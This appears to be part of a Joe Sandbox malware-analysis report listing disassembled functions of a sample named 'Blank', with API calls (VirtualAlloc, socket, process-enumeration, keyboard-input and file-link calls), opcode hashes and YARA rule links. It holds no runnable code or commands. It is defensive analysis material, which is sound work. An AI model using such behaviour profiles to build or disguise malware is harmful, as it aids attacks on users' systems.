                                                                                                                                    • Instruction Fuzzy Hash: F6C19F75A10216EFDB14DF94C884EAEB7F9FF88350B148598E809EB251DB31ED91CB90
                                                                                                                                    Function 002DE713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 002DE7A7
                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 002DE7EA
                                                                                                                                      • Part of subcall function 002DDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002DDEAE
                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 002DE9EA
                                                                                                                                    • _memmove.LIBCMT ref: 002DE9FD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3659485706-0
                                                                                                                                    • Opcode ID: 5228bd1a3ddbae637324c9943e60fe6ec17149c8aecb9b34ebfc1a4848577062
                                                                                                                                    • Instruction ID: ae00ca928a8693be8e2e14552bf86f7f09a3a5455693222bb89e34ea4ed3158d
                                                                                                                                    • Opcode Fuzzy Hash: 5228bd1a3ddbae637324c9943e60fe6ec17149c8aecb9b34ebfc1a4848577062
                                                                                                                                    • Instruction Fuzzy Hash: 15C14471A283018FCB54EF28C48096ABBE4FF89314F05896EE8999B351D731ED55CF82
                                                                                                                                    Function 002D877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002D87AD
                                                                                                                                    • CoUninitialize.OLE32 ref: 002D87B8
                                                                                                                                      • Part of subcall function 002EDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,002D8A0E,?,00000000), ref: 002EDF71
                                                                                                                                    • #8.OLEAUT32(?), ref: 002D87C3
                                                                                                                                    • #9.WSOCK32(?), ref: 002D8A94
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 948891078-0
                                                                                                                                    • Opcode ID: 2160a1bc736925f9f47972d3a29ca5ccf057f0b05a501077706ae767f7a6dbce
                                                                                                                                    • Instruction ID: 3b1bc9eb390e4b955155f1619976945b3ab9df59fde39c1bdcc514d1aa48adb1
                                                                                                                                    • Opcode Fuzzy Hash: 2160a1bc736925f9f47972d3a29ca5ccf057f0b05a501077706ae767f7a6dbce
                                                                                                                                    • Instruction Fuzzy Hash: FCA15975624B019FD710EF54C481B2AB7E4BF89354F14884AF9999B3A2CB30ED54CF92
                                                                                                                                    Function 002B814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,002F3C4C,?), ref: 002B8308
                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,002F3C4C,?), ref: 002B8320
                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,002F0988,000000FF,?,00000000,00000800,00000000,?,002F3C4C,?), ref: 002B8345
                                                                                                                                    • _memcmp.LIBCMT ref: 002B8366
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 314563124-0
                                                                                                                                    • Opcode ID: 9b943ee955d132f5c98958669ee8eaf90b8a146d90a7b818bc1b1dafda3aa67d
                                                                                                                                    • Instruction ID: 5730a1b9aa4e8c8164782115797d872cbd2684472184a67bc1d9b6cc8cd9bb7f
                                                                                                                                    • Opcode Fuzzy Hash: 9b943ee955d132f5c98958669ee8eaf90b8a146d90a7b818bc1b1dafda3aa67d
                                                                                                                                    • Instruction Fuzzy Hash: 91814D71A10109EFCB04DFD4C884EEEB7B9FF89355F104598E509AB250DB71AE06CB60
                                                                                                                                    Function 002B749B Relevance: 6.2, APIs: 4, Instructions: 202COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #8.OLEAUT32(?,?,?,00000001,?,?,?,?,?,?,?,?,?,002B779C,?,?), ref: 002B74AC
                                                                                                                                    • #2.WSOCK32(00000000,?,?,?,?,002B779C,?,?,002D9B28,?,?,?,?), ref: 002B7555
                                                                                                                                    • #10.WSOCK32(?,?,?,?,?,?,?,002B779C,?,?,002D9B28,?,?,?,?), ref: 002B7584
                                                                                                                                    • #9.WSOCK32(?,00000000,?,?,?,?,?,002B779C,?,?,002D9B28,?,?,?,?), ref: 002B75AB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 528268209ccacd83d10a0f74335270c442376171c2ee58d1ac0afe3a8fe9584a
                                                                                                                                    • Instruction ID: d6499f49dc69e29024c309316e324af3deb944a0c73d0ae4b0cbd3876f362f31
                                                                                                                                    • Opcode Fuzzy Hash: 528268209ccacd83d10a0f74335270c442376171c2ee58d1ac0afe3a8fe9584a
                                                                                                                                    • Instruction Fuzzy Hash: 4751BD346387029BD7209F79D895AADF3E99F84390F20881FE546CB6E1DB7098608B15
                                                                                                                                    Function 002DF4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 002DF526
                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 002DF534
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 002DF5F4
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 002DF603
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2576544623-0
                                                                                                                                    • Opcode ID: b2d552b28a4f9516a1d6e10eb061906351059c02fb2ebed9e31389fb4f36bbd6
                                                                                                                                    • Instruction ID: 4f334dec8233acbd75788cb9794b55c6479312b3caf1c8c08497c25391b2dff7
                                                                                                                                    • Opcode Fuzzy Hash: b2d552b28a4f9516a1d6e10eb061906351059c02fb2ebed9e31389fb4f36bbd6
                                                                                                                                    • Instruction Fuzzy Hash: 0451ADB1114311AFC311EF24DC85A6BB7E8EF94710F40492EF59A932A1EB70E924CF92
                                                                                                                                    Function 002E9E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002E9E88
                                                                                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 002E9EBB
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 002E9F28
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                    • Opcode ID: 47ad9b480a68d0922e5cfa9e811c9f35ec0d6f30ff4ff6241295e3d5a77dde30
                                                                                                                                    • Instruction ID: bf80371faa61c9d9502d96971e38fa910ed81252d028ab60c8b37ec0d65c172e
                                                                                                                                    • Opcode Fuzzy Hash: 47ad9b480a68d0922e5cfa9e811c9f35ec0d6f30ff4ff6241295e3d5a77dde30
                                                                                                                                    • Instruction Fuzzy Hash: D5516D30A10249AFCF21DF55C8849AE7BB6FB44320F54825AF915D72A0D730ADA1CF90
                                                                                                                                    Function 0028492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2782032738-0
                                                                                                                                    • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                                                                    • Instruction ID: 52974c7176d3ab6667346c81b0cc50ee9a2d3bff44e1e513cad8d2b715b89f03
                                                                                                                                    • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                                                                    • Instruction Fuzzy Hash: 6D41D6396227079BDF2CFE69C8A096F77A5AF44364B24813DE8558B6C0D770DD608B44
                                                                                                                                    Function 002BA638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002BA68A
                                                                                                                                    • __itow.LIBCMT ref: 002BA6BB
                                                                                                                                      • Part of subcall function 002BA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002BA976
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 002BA724
                                                                                                                                    • __itow.LIBCMT ref: 002BA77B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3379773720-0
                                                                                                                                    • Opcode ID: cd4775cc41d8a30191b3790caebcedd00123ba4c11ab3c5d209eaee561a9ada9
                                                                                                                                    • Instruction ID: d5ecfb5f703e61a9ad148ce41499eaf6913bfa74a0288179d2bdf45cd4fcceed
                                                                                                                                    • Opcode Fuzzy Hash: cd4775cc41d8a30191b3790caebcedd00123ba4c11ab3c5d209eaee561a9ada9
                                                                                                                                    • Instruction Fuzzy Hash: 3C418674A10209AFDF25EF58C846BEEBBB9EF44790F044019F905A3291DB709965CFA2
                                                                                                                                    Function 002D7095 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #23.WSOCK32(00000002,00000002,00000011), ref: 002D70BC
                                                                                                                                    • #111.WSOCK32(00000000), ref: 002D70CC
                                                                                                                                      • Part of subcall function 00264D37: __itow.LIBCMT ref: 00264D62
                                                                                                                                      • Part of subcall function 00264D37: __swprintf.LIBCMT ref: 00264DAC
                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002D7130
                                                                                                                                    • #111.WSOCK32(00000000), ref: 002D713C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: #111$__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3577594119-0
                                                                                                                                    • Opcode ID: 3c43dfd391e2404c28c1c99d53a59f49b7de81ee3b1dcb87105ed51c979aaeec
                                                                                                                                    • Instruction ID: 3deb703e54b7882e8b55ae67026bd34741d5f79c2c0ecccd69b8e35158856658
                                                                                                                                    • Opcode Fuzzy Hash: 3c43dfd391e2404c28c1c99d53a59f49b7de81ee3b1dcb87105ed51c979aaeec
                                                                                                                                    • Instruction Fuzzy Hash: 8841CF71720200AFEB21BF24DC86F3A77E89B05B54F148158FA999B3C2DAB49D508F90
                                                                                                                                    Function 002D6B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,002F0980), ref: 002D6B92
                                                                                                                                    • _strlen.LIBCMT ref: 002D6BC4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _strlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4218353326-0
                                                                                                                                    • Opcode ID: 13242a62878d13d0c0d50622c90d84a7cc6d46e8ba1862831cf133054b38d0f4
                                                                                                                                    • Instruction ID: fb10f9c82cce7401be07918fc0c65a138aa6ea9a0473669ace39af48b3474d5c
                                                                                                                                    • Opcode Fuzzy Hash: 13242a62878d13d0c0d50622c90d84a7cc6d46e8ba1862831cf133054b38d0f4
                                                                                                                                    • Instruction Fuzzy Hash: 0B41A271620109ABCB14FB64DCD9EBEB3A9EF54310F148156F85A97392DB30AD61CB90
                                                                                                                                    Function 002CBE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002CBEE1
                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 002CBF07
                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002CBF2C
                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002CBF58
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                    • Opcode ID: 45e25a1b12a814181100aefaa67a9fc651ec7bed545ef00e6996be7e03e5efdf
                                                                                                                                    • Instruction ID: 833176126ba73d8db47c779ec62d9b4eea2ccc1a08ad00930ec93f09210ae09f
                                                                                                                                    • Opcode Fuzzy Hash: 45e25a1b12a814181100aefaa67a9fc651ec7bed545ef00e6996be7e03e5efdf
                                                                                                                                    • Instruction Fuzzy Hash: 84413835610A11EFCB12EF14C485A59BBE1EF49324F08C488E849AB762CB30FD92CF91
                                                                                                                                    Function 002E8E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002E8F03
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InvalidateRect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 634782764-0
                                                                                                                                    • Opcode ID: 9cc3d44f12bf3a7c65b149312a61300b0a8484d585b7fd64486c6d72b1ae2d43
                                                                                                                                    • Instruction ID: 151576ad52804d60d35cd362bc898231ad659734c43da4e8aa174d880ce13187
                                                                                                                                    • Opcode Fuzzy Hash: 9cc3d44f12bf3a7c65b149312a61300b0a8484d585b7fd64486c6d72b1ae2d43
                                                                                                                                    • Instruction Fuzzy Hash: 6C31E5306B0189AEEF318E16CC49FAC37A6EB05320FD44511FA99E69E1CF70D970CA91
                                                                                                                                    Function 002EB1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002EB1D2
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002EB248
                                                                                                                                    • PtInRect.USER32(?,?,002EC6BC), ref: 002EB258
                                                                                                                                    • MessageBeep.USER32(00000000), ref: 002EB2C9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                    • Opcode ID: 20de53eae0bc11eb130ffa155cf0cda7a50ab48267a86302db6407d4599bcec5
                                                                                                                                    • Instruction ID: 10d874e4857be0cf69284d5f614ea1e75397dd739fe58bb21d9722e9423e0065
                                                                                                                                    • Opcode Fuzzy Hash: 20de53eae0bc11eb130ffa155cf0cda7a50ab48267a86302db6407d4599bcec5
                                                                                                                                    • Instruction Fuzzy Hash: 6A41CE30A54185DFDF22CF9AC884BAE7BF5FF49310F5480A9EA189B261D330A811CF50
                                                                                                                                    Function 002C12D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002C1326
                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 002C1342
                                                                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002C13A8
                                                                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 002C13FA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
